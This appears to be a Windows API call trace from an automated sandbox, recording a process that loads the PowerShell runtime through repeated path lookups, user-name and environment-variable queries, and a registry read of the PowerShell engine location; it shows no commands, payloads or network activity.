	[0228.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.151] GetLastError () returned 0xcb
	[0228.151] SetErrorMode (uMode=0x1) returned 0x1
	[0228.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10eabc | out: lpFileInformation=0x10eabc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0228.151] GetLastError () returned 0xcb
	[0228.151] SetErrorMode (uMode=0x1) returned 0x1
	[0228.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.152] GetLastError () returned 0xcb
	[0228.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x10e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.152] GetLastError () returned 0xcb
	[0228.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0228.328] GetLastError () returned 0xcb
	[0228.328] SetErrorMode (uMode=0x1) returned 0x1
	[0228.328] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2a5f548 | out: lpFileInformation=0x2a5f548*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0228.328] GetLastError () returned 0xcb
	[0228.328] SetErrorMode (uMode=0x1) returned 0x1
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetLastError () returned 0xcb
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetLastError () returned 0xcb
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetLastError () returned 0xcb
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetLastError () returned 0xcb
	[0228.669] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eca8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eca8) returned 0x1
	[0228.669] GetLastError () returned 0xcb
	[0228.669] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ecb0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ecb0) returned 1
	[0228.671] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a8029c*="Available", lpRawData=0x2a80158) returned 1
	[0228.760] GetLastError () returned 0x0
	[0228.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.761] GetLastError () returned 0xcb
	[0228.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.762] GetLastError () returned 0xcb
	[0228.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.770] GetLastError () returned 0xcb
	[0228.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.770] GetLastError () returned 0xcb
	[0228.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.770] GetLastError () returned 0xcb
	[0228.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.773] GetLastError () returned 0xcb
	[0228.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.773] GetLastError () returned 0xcb
	[0228.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.773] GetLastError () returned 0xcb
	[0228.773] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0228.773] GetLastError () returned 0xcb
	[0228.773] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0228.773] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.774] GetLastError () returned 0xcb
	[0228.775] GetCurrentProcessId () returned 0x6dc
	[0228.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.775] GetLastError () returned 0xcb
	[0228.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.775] GetLastError () returned 0xcb
	[0228.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.775] GetLastError () returned 0xcb
	[0228.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.775] GetLastError () returned 0xcb
	[0228.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.775] GetLastError () returned 0xcb
	[0228.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.775] GetLastError () returned 0xcb
	[0228.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.776] GetLastError () returned 0xcb
	[0228.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.776] GetLastError () returned 0xcb
	[0228.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.776] GetLastError () returned 0xcb
	[0228.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.776] GetLastError () returned 0xcb
	[0228.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.776] GetLastError () returned 0xcb
	[0228.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.776] GetLastError () returned 0xcb
	[0228.777] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ec3c | out: phkResult=0x10ec3c*=0x3b0) returned 0x0
	[0228.777] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ec84, lpData=0x0, lpcbData=0x10ec80*=0x0 | out: lpType=0x10ec84*=0x1, lpData=0x0, lpcbData=0x10ec80*=0x56) returned 0x0
	[0228.777] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ec84, lpData=0x5090b0, lpcbData=0x10ec80*=0x56 | out: lpType=0x10ec84*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10ec80*=0x56) returned 0x0
	[0228.777] RegCloseKey (hKey=0x3b0) returned 0x0
	[0228.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.778] GetLastError () returned 0xcb
	[0228.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.778] GetLastError () returned 0xcb
	[0228.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.778] GetLastError () returned 0xcb
	[0228.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e714, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.778] GetLastError () returned 0xcb
	[0228.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.778] GetLastError () returned 0xcb
	[0228.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.778] GetLastError () returned 0xcb
	[0228.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.790] GetLastError () returned 0xcb
	[0228.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.790] GetLastError () returned 0xcb
	[0228.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.790] GetLastError () returned 0xcb
	[0228.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.805] GetLastError () returned 0xcb
	[0228.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.805] GetLastError () returned 0xcb
	[0228.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.805] GetLastError () returned 0xcb
	[0228.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.805] GetLastError () returned 0xcb
	[0228.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.806] GetLastError () returned 0xcb
	[0228.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.806] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
